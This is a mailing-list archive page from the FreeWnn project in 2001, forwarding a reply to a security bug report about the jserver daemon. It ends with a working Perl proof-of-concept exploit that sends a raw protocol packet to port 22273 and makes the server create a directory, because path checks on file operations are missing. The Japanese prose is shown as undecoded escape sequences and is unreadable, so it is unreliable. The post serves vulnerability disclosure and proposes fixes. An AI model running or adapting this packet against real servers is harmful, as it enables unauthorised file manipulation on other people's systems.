[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[freewnn:00688] Fw: Re: security bug report



$BEDH*$5$s$+$i$NJV;v$,$-$^$7$?!#(B


$BEDH*$G$9(B

$B%a%$%j%s%0%j%9%H$K$O;22C$7$F$$$J$$$N$G(B
$B>.Ln$5$s$N$_$X$N%j%W%i%$$H$J$j$^$9!#E>Aw$J$I$O8f<+M3$K$I$&$>!#(B

<20010814210653L.hiroo@oikumene.gcd.org>$B$N5-;v$K$*$$$F(B
hiroo@oikumene.gcd.org$B$5$s$O=q$-$^$7$?!#(B

>> $BEDH*$5$s$,%A%'%C%/$5$l$?(B FreeWnn $B$N%P!<%8%g%s$H!"%=!<%9%3!<%I$N3:Ev$9(B
>> $B$k2U=j$r65$($FD:$1$J$$$G$7$g$&$+!#(B
FreeWnn-1.1.1-a17$B$G$9!#(B
exploit$B%W%m%0%i%`$N40A4HG$O:G8e$KIU$1$^$9(B($B<c43>iD9$J%=!<%9$G$9$,(B)

jserver/de.c $B$N(Bdemon_main.c() $B$G%Q%1%C%H$r<u$1$H$j(B
jserver/dispatch.c $B$N(B do_command() $BCf$N(Bswitch$BJ8$G(B
js_mkdir()$B$d(B js_dic_file_create()$B$r7P$F<B:]$N%U%!%$%kA`:n$X;j$k$^$G$N(B
$B%Q%9$G%A%'%C%/$,9T$J$o$l$F$$$J$$$H$$$&$3$H$,LdBj$N$h$&$G$9!#(B
$BB>$K$b$"$k$H;W$$$^$9$N$G%A%'%C%/$r$*4j$$$7$^$9!#(B

>> $B$3$l$+$iD4::$9$k$H$3$m$G$9$,!"Js9p$7$FD:$$$?FbMF$+$i$9$k$H!"(BWnn $B$N%W%m(B
>> $B%H%3%k$N@5Ev$JMW5a$N$h$&$J$N$G(B ($BKR2NE*$J;~Be$K:n$i$l$?$b$N$H$$$&$3$H$J(B
>> $B$N$G$7$g$&$,(B)$B!"$h$/9M$($FJQ99$r2C$($kI,MW$,$"$k$H;W$C$F$$$^$9!#(B
>> (cf. [freewnn:00683])
>> $BBP:v$K$D$$$FDs0F$,$"$l$P4?7^CW$7$^$9!#(B

$BBP:v$H$7$F$O(B

*root$B$G5/F0$7$?:]$K$O(BTCP$B$K$h$k@\B3$O<u$1$J$$(B
*root$B$GF0$+$7$F$O$$$1$J$$$3$H$rL@5-$9$k(B/root$B$G$OF0$+$J$$$h$&$K$9$k(B
*$B<-=q$N%G%#%l%/%H%j$N30$K$O%U%!%$%kA`:n$r$G$-$J$$$h$&$K$9$k(B
*$BFCDj$NL>A0$N%Q%?!<%s$r;}$C$?%U%!%$%k0J30$OA`:n$G$-$J$$$h$&$K$9$k(B
*Wnn6$B$HF1$8(Bwnnhosts$B$r:NMQ$9$k!"$?$@$7$3$N%"%/%;%9%3%s%H%m!<%k$O@\B3;~$K9T$&(B

$B$J$I$,;W$$$D$-$^$9!#(B

>> $B;CDj:v(B (workaround)$B!"915W:v(B (solution) $B$,Dj$^$j<!BhJs9p$7$?$$$H9M$($F(B
>> $B$$$^$9$,!"$=$&$$$&$o$1$G!":#$9$0$O<($;$^$;$s!#(B
solution$B$r9M$($k:]$K$O(B
*$B<-=q%U%!%$%k$N%W%i%$%P%7!<(B
*$BG'>Z(B
*$BDL?.$N0E9f2=(B
$B$J$I$b8!F$$r$*4j$$$7$^$9!#(B

$B0J2<$O>iD9$G$9$,!"LdBj$r0z$-5/$3$9%W%m%0%i%`$G$9(B

#! /usr/bin/perl
          ($them,$port) = @ARGV;
         $port = 22273 unless $port;
         $them = 'localhost' unless $them;

         $SIG{'INT'} = 'dokill';
         sub dokill { kill 9,$child if $child; }

         use Socket;

         $sockaddr = 'S n a4 x8';
         chop($hostname = `hostname`);

         ($name, $aliases, $proto) = getprotobyname('tcp');
         ($name, $aliases, $port) = getservbyname($port, 'tcp')
             unless $port =~ /^\d+$/;
         ($name, $aliases, $type, $len, $thisaddr) =
                         gethostbyname($hostname);
         ($name, $aliases, $type, $len, $thataddr) = gethostbyname($them);

         $this = pack($sockaddr, &AF_INET, 0, $thisaddr);
         $that = pack($sockaddr, &AF_INET, $port, $thataddr);

         socket(S, &PF_INET, &SOCK_STREAM, $proto) || die "socket: $!";
#         bind(S, $this) || die "bind: $!";
         connect(S, $that) || die "connect: $!";

         select(S); $| = 1; select(STDOUT);
	print "connected!";

         if ($child = fork) {
	     print STDOUT "send";
	     print S "\x00\x00\x00\x66\x00\x00\x00\x00".
		 "/tmp/hoge\x00".
		     "\x00\x00\x00\x00\x00\x00\x00\x03";
	     print STDOUT ".done.\n";
             sleep 3;
             do dokill();
         }
         else {
             while (<S>) {
                 print;
             }
         }




http://www.freewnn.org/ FreeWnn Project